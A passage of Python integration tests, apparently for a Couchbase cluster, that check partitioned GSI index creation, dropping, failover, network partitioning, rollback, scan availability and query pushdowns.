create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{0}}}".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = self.defer_build
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
# Validation for replica indexes
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_details[
"index_name"] = index_name_prefix + " (replica {0})".format(
str(i))
self.assertTrue(
self.validate_partitioned_indexes(index_details,
index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
self.cluster.bucket_delete(server=self.master, bucket='default')
self.sleep(30)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_drop_partitioned_index_one_failed_node(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
node_out = self.servers[self.node_out]
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
drop_index_query = "DROP INDEX `default`." + index_name_prefix
try:
self.n1ql_helper.run_cbq_query(query=drop_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"Drop index failed with error : {0}".format(str(ex)))
self.sleep(30)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
if self.recover_failed_node:
nodes_all = self.rest.node_statuses()
for node in nodes_all:
if node.ip == node_out.ip:
break
self.rest.set_recovery_type(node.id, self.recovery_type)
self.rest.add_back_node(node.id)
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached,
"rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(180)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_failover_during_drop_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(
str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
node_out = self.servers[self.node_out]
drop_index_query = "DROP INDEX `default`." + index_name_prefix
threads = []
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query,
name="run_query",
args=(drop_index_query, 10, self.n1ql_node)))
threads.append(
Thread(target=self.cluster.async_failover, name="failover",
args=(
self.servers[:self.nodes_init], [node_out],
self.graceful)))
for thread in threads:
thread.start()
thread.join()
self.sleep(30)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_drop_partitioned_index_with_network_partitioning(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
node_out = self.servers[self.node_out]
self.start_firewall_on_node(node_out)
drop_index_query = "DROP INDEX `default`." + index_name_prefix
try:
self.start_firewall_on_node(node_out)
self.sleep(10)
self.n1ql_helper.run_cbq_query(query=drop_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if not "the operation will automaticaly retry after cluster is back to normal" in str(ex):
self.fail(
"index drop failed with error : {0}".format(str(ex)))
else:
self.log.info("Index drop failed with expected error")
finally:
# Heal network partition and wait for some time to allow indexes
# to get built automatically on that node
self.stop_firewall_on_node(node_out)
self.sleep(360)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_partitioned_index_warmup_behaviour(self):
node_out = self.servers[self.node_out]
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI"
if self.defer_build:
create_index_query += " WITH {'defer_build':true}"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = self.defer_build
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
remote_client = RemoteMachineShellConnection(node_out)
if self.node_operation == "kill_indexer":
remote_client.terminate_process(process_name="indexer")
remote_client.disconnect()
else:
self.reboot_node(node_out)
# wait for restart and warmup on all node
self.sleep(self.wait_timeout * 3)
# disable firewall on these nodes
self.stop_firewall_on_node(node_out)
# wait till node is ready after warmup
ClusterOperationHelper.wait_for_ns_servers_or_assert([node_out], self,
wait_if_warmup=True)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After:")
self.log.info(index_metadata)
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index warmup behavior not as expected")
def test_mutations_on_partitioned_indexes(self):
self.run_async_index_operations(operation_type="create_index")
self.run_doc_ops()
self.sleep(30)
# Get item counts
bucket_item_count, total_item_count, total_num_docs_processed = self.get_stats_for_partitioned_indexes()
self.assertEqual(bucket_item_count, total_item_count,
"# Items indexed {0} do not match bucket items {1}".format(
total_item_count, bucket_item_count))
def test_update_mutations_on_indexed_keys_partitioned_indexes(self):
create_index_query = "CREATE INDEX idx1 ON default(name,mutated) partition by hash(name) USING GSI;"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.run_doc_ops()
self.sleep(30)
# Get item counts
bucket_item_count, total_item_count, total_num_docs_processed = self.get_stats_for_partitioned_indexes(
index_name="idx1")
self.assertEqual(bucket_item_count, total_item_count,
"# Items indexed {0} do not match bucket items {1}".format(
total_item_count, bucket_item_count))
def test_kv_full_rollback_on_partitioned_indexes(self):
self.run_async_index_operations(operation_type="create_index")
self.sleep(30)
self.cluster.bucket_flush(self.master)
self.sleep(60)
# Get item counts
bucket_item_count, total_item_count, total_num_docs_processed = self.get_stats_for_partitioned_indexes()
self.assertEqual(total_item_count, 0, "Rollback to zero fails")
def test_kv_partial_rollback_on_partitioned_indexes(self):
self.run_async_index_operations(operation_type="create_index")
# Stop Persistence on Node A & Node B
self.log.info("Stopping persistence on NodeA & NodeB")
mem_client = MemcachedClientHelper.direct_client(self.servers[0],
"default")
mem_client.stop_persistence()
mem_client = MemcachedClientHelper.direct_client(self.servers[1],
"default")
mem_client.stop_persistence()
self.run_doc_ops()
self.sleep(10)
# Get count before rollback
bucket_count_before_rollback, item_count_before_rollback, num_docs_processed_before_rollback = self.get_stats_for_partitioned_indexes()
# Kill memcached on Node A so that Node B becomes master
self.log.info("Kill Memcached process on NodeA")
shell = RemoteMachineShellConnection(self.master)
shell.kill_memcached()
# Start persistence on Node B
self.log.info("Starting persistence on NodeB")
mem_client = MemcachedClientHelper.direct_client(
self.input.servers[1], "default")
mem_client.start_persistence()
# Failover Node B
self.log.info("Failing over NodeB")
self.sleep(10)
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init], [self.servers[1]], self.graceful,
wait_for_pending=120)
failover_task.result()
# Wait for a couple of mins to allow rollback to complete
self.sleep(120)
# Get count after rollback
bucket_count_after_rollback, item_count_after_rollback, num_docs_processed_after_rollback = self.get_stats_for_partitioned_indexes()
self.assertEqual(bucket_count_after_rollback, item_count_after_rollback,
"Partial KV Rollback not processed by Partitioned indexes")
def test_scan_availability(self):
create_index_query = "CREATE INDEX idx1 ON default(name,mutated) partition by hash(BASE64(meta().id)) USING GSI"
if self.num_index_replicas:
create_index_query += " with {{'num_replica':{0}}};".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
node_out = self.servers[self.node_out]
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=60)
failover_task.result()
self.sleep(30)
# Run query
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
self.n1ql_helper.run_cbq_query(query=scan_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if self.num_index_replicas == 0:
if self.expected_err_msg in str(ex):
pass
else:
self.fail(
"Scan failed with unexpected error message".format(
str(ex)))
else:
self.fail("Scan failed")
def test_scan_availability_with_network_partitioning(self):
create_index_query = "CREATE INDEX idx1 ON default(name,mutated) partition by hash(BASE64(meta().id)) USING GSI"
if self.num_index_replicas:
create_index_query += " with {{'num_replica':{0}}};".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
# Induce network partitioning on one of the nodes
node_out = self.servers[self.node_out]
self.start_firewall_on_node(node_out)
# Run query
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
self.n1ql_helper.run_cbq_query(query=scan_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(
"Scan failed as one indexer node was experiencing network partititioning. Error : %s",
str(ex))
# Heal Network Partitioning
self.stop_firewall_on_node(node_out)
# Re-run query
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
self.n1ql_helper.run_cbq_query(query=scan_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if self.num_index_replicas:
if self.expected_err_msg in str(ex):
pass
else:
self.fail(
"Scan failed with unexpected error message".format(
str(ex)))
else:
self.fail("Scan failed")
def test_index_scans(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned and non-partitioned indexes
if self.num_index_partitions > 0:
self.rest.set_index_settings(
{"indexer.numPartitions": self.num_index_partitions})
create_partitioned_index1_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(name,dept,salary) USING GSI;"
create_index1_query = "CREATE INDEX non_partitioned_idx1 ON default(name,dept,salary) USING GSI;"
create_partitioned_index2_query = "create index partitioned_idx2 on default(name,manages.team_size) partition by hash(manages.team_size) USING GSI;"
create_index2_query = "create index non_partitioned_idx2 on default(name,manages.team_size) USING GSI;"
create_partitioned_index3_query = "create index partitioned_idx3 on default(name,manages.team_size) partition by hash(name,manages.team_size) USING GSI;"
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index1_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index1_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index2_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index2_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index3_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
# Scans
queries = []
# 1. Small lookup query with equality predicate on the partition key
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name='Safiya Palmer'"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 2. Pagination query with equality predicate on the partition key
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name is not missing AND dept='HR' offset 0 limit 10"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 3. Large aggregated query
query_details = {}
query_details[
"query"] = "select count(name), dept from default USE INDEX (indexname USING GSI) where name is not missing group by dept"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 4. Scan with large result sets
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name is not missing AND salary > 10000"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 5. Scan that does not require sorted data
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name is not missing AND salary > 100000"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 6. Scan that requires sorted data
query_details = {}
query_details[
"query"] = "select name,dept,salary from default USE INDEX (indexname USING GSI) where name is not missing AND salary > 10000 order by dept asc,salary desc"
query_details["partitioned_idx_name"] = "partitioned_idx1"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx1"
queries.append(query_details)
# 7. Scan with predicate on a dataset that has some values for the partition key missing, and present for some
query_details = {}
query_details[
"query"] = "select name from default USE INDEX (indexname USING GSI) where name is not missing AND manages.team_size > 3"
query_details["partitioned_idx_name"] = "partitioned_idx2"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx2"
queries.append(query_details)
# 8. Index partitioned on multiple keys. Scan with predicate on multiple keys with a dataset that has some values for the partition keys missing, and present for some
query_details = {}
query_details[
"query"] = "select name from default USE INDEX (indexname USING GSI) where manages.team_size >= 3 and manages.team_size <= 7 and name like 'A%'"
query_details["partitioned_idx_name"] = "partitioned_idx3"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx2"
queries.append(query_details)
# 9. Overlap scans on partition keys
query_details = {}
query_details[
"query"] = "select name from default USE INDEX (indexname USING GSI) where name is not missing AND (manages.team_size >= 3 or manages.team_size >= 7)"
query_details["partitioned_idx_name"] = "partitioned_idx2"
query_details["non_partitioned_idx_name"] = "non_partitioned_idx2"
queries.append(query_details)
total_scans = 0
failures = 0
for query_details in queries:
total_scans += 1
try:
query_partitioned_index = query_details["query"].replace(
"indexname", query_details["partitioned_idx_name"])
query_non_partitioned_index = query_details["query"].replace(
"indexname", query_details["non_partitioned_idx_name"])
result_partitioned_index = \
self.n1ql_helper.run_cbq_query(
query=query_partitioned_index,
min_output_size=10000000,
server=self.n1ql_node)["results"]
result_non_partitioned_index = self.n1ql_helper.run_cbq_query(
query=query_non_partitioned_index, min_output_size=10000000,
server=self.n1ql_node)["results"]
self.log.info("Partitioned : {0}".format(
str(result_partitioned_index.sort())))
self.log.info("Non Partitioned : {0}".format(
str(result_non_partitioned_index.sort())))
if result_partitioned_index.sort() != result_non_partitioned_index.sort():
failures += 1
self.log.info(
"*** This query does not return same results for partitioned and non-partitioned indexes.")
except Exception as ex:
self.log.info(str(ex))
self.log.info(
"Total scans : {0}, Matching results : {1}, Non-matching results : {2}".format(
total_scans, total_scans - failures, failures))
self.assertEqual(failures, 0,
"Some scans did not yield the same results for partitioned index and non-partitioned indexes. Details above.")
def test_load_balancing_amongst_partitioned_index_replicas(self):
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(age) partition by hash (meta().id) USING GSI WITH {{'num_replica': {0},'num_partition':{1}}};".format(
self.num_index_replicas, self.num_index_partitions)
select_query = "SELECT count(age) from default"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if self.expected_err_msg not in str(ex):
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
else:
self.log.info("Index creation failed as expected")
self.sleep(30)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
self.assertTrue(self.validate_partition_map(index_metadata, index_name_prefix,
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
# Run select query 100 times
for i in range(0, 100):
self.n1ql_helper.run_cbq_query(query=select_query,
server=self.n1ql_node)
index_stats = self.get_index_stats(perNode=True)
load_balanced = True
for i in range(0, self.num_index_replicas + 1):
if i == 0:
index_name = index_name_prefix
else:
index_name = index_name_prefix + " (replica {0})".format(str(i))
hosts, _ = self.n1ql_helper.get_index_details_using_index_name(
index_name, index_map)
for hostname in hosts:
num_request_served = index_stats[hostname]['default'][index_name][
"num_completed_requests"]
self.log.info("# Requests served by %s on %s = %s" % (
index_name, hostname, num_request_served))
if num_request_served == 0:
load_balanced = False
if not load_balanced:
self.fail("Load is not balanced amongst index replicas")
def test_indexer_pushdowns_multiscan(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name from default where name is not missing and dept='HR' and salary > 120000 and salary < 150000"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
span_pushdown, _, _, _, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
num_spans=3)
self.assertTrue(span_pushdown, "Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select name from default where name is not missing and dept='HR' and salary BETWEEN 120000 and 150000"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
span_pushdown, _, _, _, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
num_spans=3)
self.assertTrue(span_pushdown, "Operators not pushed down to indexer")
explain_query3 = "EXPLAIN select name from default where name is not missing and dept='HR' and (salary > 120000 or salary > 180000)"
results = self.n1ql_helper.run_cbq_query(query=explain_query3,
server=self.n1ql_node)
self.log.info("Explain plan for query 3 : {0}".format(results))
span_pushdown, _, _, _, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
num_spans=3)
self.assertTrue(span_pushdown, "Operators not pushed down to indexer")
def test_indexer_pushdowns_offset_limit(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name from default where name is not missing and dept='HR' and salary > 120000 and salary < 150000 OFFSET 10 LIMIT 10"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, limit_pushdown, offset_pushdown, _, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
offset=10, limit=10)
self.assertTrue(limit_pushdown & offset_pushdown,
"Operators not pushed down to indexer")
def test_indexer_pushdowns_projection(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name from default where name is not missing and lower(dept) > 'accounts'"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
self.sleep(30)
_, _, _, projection_pushdown, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
projection_list=[0, 1])
self.assertTrue(projection_pushdown,
"Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select name,dept,salary from default where name is not missing and lower(dept) > 'accounts'"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, _, _, projection_pushdown, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
projection_list=[0, 1, 2])
self.assertTrue(projection_pushdown,
"Operators not pushed down to indexer")
explain_query3 = "EXPLAIN select meta().id from default where name is not missing and lower(dept) > 'accounts'"
results = self.n1ql_helper.run_cbq_query(query=explain_query3,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, _, _, projection_pushdown, _ = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
projection_list=[0, 1])
self.assertTrue(projection_pushdown,
"Operators not pushed down to indexer")
def test_indexer_pushdowns_sorting(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name,dept,salary from default where name is not missing order by name,dept,salary"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, _, _, _, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"],
index_name="partitioned_idx1",
index_order_list=[{'keypos': 0}, {'keypos': 1}, {'keypos': 2}])
self.assertTrue(sorting_pushdown,
"Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select name,dept,salary from default where name is not missing order by name,dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
_, _, _, _, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"],
index_name="partitioned_idx1",
index_order_list=[{'keypos': 0}, {'keypos': 1}])
self.assertTrue(sorting_pushdown,
"Operators not pushed down to indexer")
explain_query3 = "EXPLAIN select meta().id from default where name is not missing order by name"
results = self.n1ql_helper.run_cbq_query(query=explain_query3,
server=self.n1ql_node)
self.log.info("Explain plan for query 3 : {0}".format(results))
_, _, _, _, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"],
index_name="partitioned_idx1",
index_order_list=[{'keypos': 0}])
self.assertTrue(sorting_pushdown,
"Operators not pushed down to indexer")
def test_indexer_pushdowns_sorting_desc(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary desc) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name,dept,salary from default where name is not missing order by name,dept,salary desc"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, _, _, _, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"],
index_name="partitioned_idx1",
index_order_list=[{'keypos': 0}, {'keypos': 1},
{"desc": True, 'keypos': 2}])
self.assertTrue(sorting_pushdown,
"Operators not pushed down to indexer")
def test_multiple_operator_indexer_pushdowns(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name from default where name is not missing order by name OFFSET 10 LIMIT 10"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
scan_pushdown, limit_pushdown, offset_pushdown, projection_pushdown, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
num_spans=1, offset=10, limit=10, index_order_list=[{'keypos': 0}],
projection_list=[0])
self.assertTrue(
scan_pushdown & limit_pushdown & offset_pushdown & projection_pushdown & sorting_pushdown,
"Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_group_by_leading_keys(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select dept,count(*) from default where dept is not missing GROUP BY dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select dept,sum(salary), min(salary), max(salary), avg(salary) from default where dept is not missing GROUP BY dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_group_by_partition_keys(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(LOWER(name),UPPER(dept)) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
